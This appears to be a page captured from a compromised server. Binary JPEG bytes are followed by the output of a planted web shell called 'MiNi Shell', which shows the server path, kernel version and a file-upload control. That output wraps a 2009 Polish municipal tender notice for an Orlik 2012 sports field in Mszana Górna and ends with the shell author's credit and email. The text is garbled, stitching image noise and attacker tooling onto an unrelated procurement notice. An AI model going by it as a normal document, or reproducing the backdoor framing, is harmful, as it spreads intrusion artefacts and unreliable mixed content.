JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090521/161324-N-2009.html

<p class="kh_header"><b>Mszana Dolna: Budowa kompleksu sportowego Moje boisko Orlik 2012
Przy Zespole Placówek Oświatowych w Mszanie Górnej - Etap I</b><br>
<b>Numer ogłoszenia: 161324 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , ul. Spadochroniarzy 6, 34-730 Mszana Dolna, woj. małopolskie, tel. 018 3310009 w. 615, 3319815, faks 018 3311242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mszana.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu sportowego Moje boisko Orlik 2012
Przy Zespole Placówek Oświatowych w Mszanie Górnej - Etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie robót budowlanych kompleksu sportowego w ramach programu  Moje boisko Orlik 2012  przy zespole placówek oświatowych w Mszanie Górnej bez zaplecza sanitarno szatniowego .
I obejmuje  
  a) Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. Całkowitej
1860m2 ( pole gry 26,0 x 56,0 m) 
- podbudowa przepuszczalna 
- nawierzchnia do piłki nożnej - sztuczna trawa 
Wysokość włókna min. 40 mm na podkładzie z maty elastycznej jeżeli jest wymagana  (typ maty, jej grubość oraz wypełnienie trawy syntetycznej zgodnie z badaniem laboratorium np. Labosport) 
1. Typ włókna monofil 
2. Skład chemiczny włókna polietylen 
3. Ciężar włókna min. 11.000 Dtex, 
4. Gęstość trawy min. 97.000 włókien m2 
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej (załącznik nr 3 do SIWZ) i STWiOR oraz SST (załącznik nr 2 do SIWZ)
          - obrzeża gumowe na ławie z betonu B15 oddzielające sąsiednie elementy terenu od płyty boiska . Wszystkie elementy zgodnie z właściwościami Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej (załącznik 3 do SIWZ) i STWiOR oraz SST (załącznik 2 do SIWZ) 
                - wyposażenie
       -  bramki aluminiowe (5 x 2m) mocowane wtulejach -2 sztuki 
       -   siatki bramek - 2 sztuki 
    b)  Budowę boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 m o powierzchni 613,11m2 (pole do gry 15,1 x 28,1 m) 
- podbudowa przepuszczalna 
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej (załącznik nr 3 do SIWZ). 
Roboty należy wykonać zgodnie z dokumentacją projektową ( załącznik nr 3 do SIWZ) i STWiOR oraz SST (załącznik nr 2 do SIWZ) 
- nawierzchnia boiska wielofunkcyjnego 
nawierzchnia poliuretanowa wykonana o właściwościach i technologii układania określonych w dokumentacji projektowej (załącznik nr 3 do SIWZ) i STWiOR oraz SST (załącznik nr 2 do SIWZ) 
- technologie układania nawierzchni 
      Technologia typu EPDM - nawierzchnia gładka , przepuszczalna dla wody wykonana dwuwarstwowo. W przypadku zastosowania podbudowy przepuszczalnej nawierzchnie tego typu należy wykonać na podbudowie elastycznej typu ET ( w przypadku nieprzepuszczalnej podbudowy betonowej , asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana) 
      Dolna warstwa z granulatu SBR min 7 mm, górna warstwa wykonana z kolorowego granulatu EPDM min. 7 mm. 
         -  wyposażenie do piłki koszykowej ( 2 zestawy) 
obręcz do koszykówki standard (uchylna) i siatka do obręczy - 2 sztuki 
tablica do koszykówki epoksydowa o wym. 105 x 180cm - 2 sztuki 
stojak stalowy ocynkowany regulowany o wysięgu 160 cm. -2 sztuki 
   - wyposażenie do piłki siatkowej (1 zestaw)
słupki do siatkówki stalowe ,  wielofunkcyjne (badminton, tenis, siatkówka) 2 sztuki 
siatka całosezonowa do siatkówki -  1 sztuka
c) Ogrodzenie terenu 
Szczegółowe rozwiązania wg dokumentacji projektowej, STWiOR oraz SST. 
d) Oświetlenie terenu 
Oświetlenie obiektu będą stanowiły projektory zamocowane na 8 masztach o wysokości min. 12 m. Szczegółowe rozwiązania wg dokumentacji projektowej, STWiOR oraz SST. 
e) Chodniki  płyty 50x50x4cm z  granulatu gumowego oraz kostki betonowej 20x10x6cm .
Szczegółowe rozwiązania wg dokumentacji projektowej, STWiOR oraz SST. 
   wymagany okres gwarancji
   - na wykonane roboty( materiały i robociznę ) wynosi 36 miesiecy  od dnia odebrania przez zamawiającego robót budowlanych i podpisania bez uwag protokołu końcowego ,
 - na nawierzchnie syntetyczne - 60 miesięcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w
wysokości : 25.000,00 PLN  .Wadium może być wnoszone w jednej lub kilku następujących
formach:a) pieniądzu:przelewem na rachunek bankowy Zamawiającego: BS Mszana Dolna 
Nr 64 8808 0006 0010 0000 1690 0036
b)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
 kredytowej,  z tym że  poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych; d) gwarancjach ubezpieczeniowych
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2   
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju    Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
W przypadku wadium wnoszonego w pieniądzu należy dołączyć kopię polecenia przelewu do oferty.
W przypadku wadium wnoszonego w innych dopuszczonych formach należy złożyć oryginał dokumentu z ofertą . 

Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas , gdy bank prowadzący rachunek Zamawiającego potwierdzi , ze otrzymał taki przelew przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy: 
1) posiadają uprawnienia do wykonywania  działalności lub czynności w zakresie
    odpowiadającym przedmiotowi zamówienia oraz nie podlegają wykluczeniu na
    podstawie art.24 u.p.z.p. W celu potwierdzenia spełnienia niniejszego warunku
    Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 

a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do           
      ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu   
      do rejestru lub zgłoszenia do ewidencji  - za aktualny będzie uważany 
      dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
      składania ofert w formie odpisu lub zaświadczenia potwierdzającego, iż Wykonawca     
      nadal figuruje w rejestrze działalności.
 
b)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz    właściwego oddziału Zakładu Ubezpieczeń społecznych lub kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio , że wykonawca nie zalega z opłacaniem podatków opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń  że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności. lub wstrzymanie w całości wykonania decyzji właściwego organu  Za ważne będzie uznane zaświadczenie wystawione przez ZUS , US lub KRUS nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców muszą być złożone dokumenty dotyczące każdego z nich (a, b) .


2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem
    technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
    technicznego i osób zdolnych do wykonania zamówienia . W szczególności muszą
    spełnić następujący  warunek : 

    a)  Kierownik Robót  - niniejsza osoba ma posiadać kwalifikacje  co najmniej 5 lata doświadczenia, posiadający uprawnienia budowlane w zakresie niezbędnym do wykonania zamówienia w specjalnościach :
         - konstrukcyjno-budowlanej ,
         - instalacyjnej w zakresie sieci , instalacji i urządzeń  elektrycznych i elektroenergetycznych 
         oraz zaświadczenia , wydanego przez właściwą izbę samorządu zawodowego (OIIB) potwierdzającego wpis danej osoby na listę członków właściwej izby .
 
     b) wykażą się wykonaniem w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy w tym okresie rzetelnie i należycie co najmniej dwóch  robót budowlanych polegających na budowie boisk sportowych w tym : jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową  .

     

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
    zamówienia; 

    a) posiadają środki finansowe w wysokości co najmniej 500.000,00 PLN lub zdolność  kredytową w wysokości co najmniej 500.000,00 PLN ,

    b) posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż  500.000,00 PLN . 

W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub
więcej Wykonawców oceniane będzie łącznie  ich doświadczenie i sytuacja
ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci
Wykonawcy , którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku .

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach
 ( wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.

W przypadku nie złożenia wymaganych przez Zamawiającego oświadczeń lub dokumentów  albo złożenia wymaganych przez zamawiającego oświadczeń i dokumentów zawierających błędy, albo złożenia wadliwych pełnomocnictw, Zamawiający wezwie trybie art. 26 ust 3 Wykonawców  do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w ostępowaniu, każdy z Wykonawców  przedkłada  wraz z ofertą  sporządzoną na formularzu OFERTA ( Zał. Nr 1 do SIWZ) następujące oświadczenia dokumenty,  informacje i wykazy składające się na ofertę:

1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 7 oraz Załącznik Nr 8 do niniejszej SIWZ.

2. Oświadczenie wykonawcy, że akceptuje projekt umowy ( ZAł. Nr 4 do SIWZ) ,

3. Kosztorys ofertowy uproszczony  - wyceniony na podstawie przedmiaru robót,

      4. wykaz osób odpowiedzialnych za realizację zamówienia publicznego ( kierownicy robót - uprawnienia , przynależność do właściwej izby samorządu zawodowego , informacji z przebiegu pracy zawodowej potwierdzającej spełnienie warunków zamawiającego   oraz wykazu  pracowników  przewidzianych do  udziału w wykonaniu zamówienia publicznego Zał. Nr 5 do SIWZ ,

      5. wykaz wykonanych robót budowlanych  oraz dokumenty potwierdzające , że roboty te zostały wykonane należycie, Zaleca się żeby przedkładane dokumenty potwierdzały , że wykonane przez Wykonawcę roboty zostały wykonane należycie zawierały co najmniej : a) wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty których dokumenty dotyczą, b) wskazanie podmiotu na rzecz którego realizowane były roboty, c) wskazanie zakresu robót, d) wskazanie wartości robót, e) wskazanie daty wykonania ( rozpoczęcia  i zakończenia ), f) wskazanie miejsca wykonania, g) opinię podmiotu wskazanego powyżej w pkt.b stwierdzającą, że roboty zostały wykonane należycie (Zał. Nr 6 do SIWZ ) .    

6. informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej , wystawiona nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert potwierdzająca posiadanie środków finansowych lub posiadanie przez wykonawcę zdolności kredytowej ,

7.polisa a w przypadku jej braku inny dokument potwierdzający , że wykonawca   
 jest ubezpieczony  od odpowiedzialności cywilnej  w zakresie prowadzonej 
działalności, 

8. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do           
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu   
do rejestru lub zgłoszenia do ewidencji - wystawione nie wcześniej niż 6 
miesięcy przed upływem terminu składania ofert, 
  
9. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz    
właściwego oddziału Zakładu Ubezpieczeń społecznych lub kasy Rolniczego  
Ubezpieczenia Społecznego- wystawione nie wcześniej niż 3 
miesiące przed upływem terminu składania ofert, 
 
10.zabezpieczenie oferty wadium.

11. Dokumenty potwierdzające spełnianie warunków jakościowych:
-  dotyczące nawierzchni poliuretanowej:

1)	Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.

2)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3)	Atest PZH dla oferowanej nawierzchni.
4)	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
- dotyczące nawierzchni z trawy syntetycznej:

1)	Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
2)	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 
3)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta
4)	Atest PZH dla oferowanej nawierzchni.
5)	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.


Ponadto wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą Pełnomocnictwo dla pełnomocnika, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego .  


Załączone dokumenty powinny być wystawione i podpisane przez osobę upoważnioną do reprezentowania firmy, wskazaną do reprezentacji we właściwym rejestrze lub ewidencji o działalności gospodarczej, lub osoby posiadające imienne upoważnienie lub  do reprezentowania Wykonawcy   w niniejszym zamówieniu. 
Dopuszcza się możliwość złożenia kserokopii lub odpisów wymaganych dokumentów poświadczonych za zgodność z oryginałem przez osobę upoważnioną do reprezentowania wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mszana.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 34-730 Mszana Dolna ul. Spadochroniarzy 6 pok. nr 44.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2009 godzina 10:00, miejsce: Urząd Gminy Mszana Dolna ul. Spadochroniarzy 6 pok. nr 32 - sekretariat urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com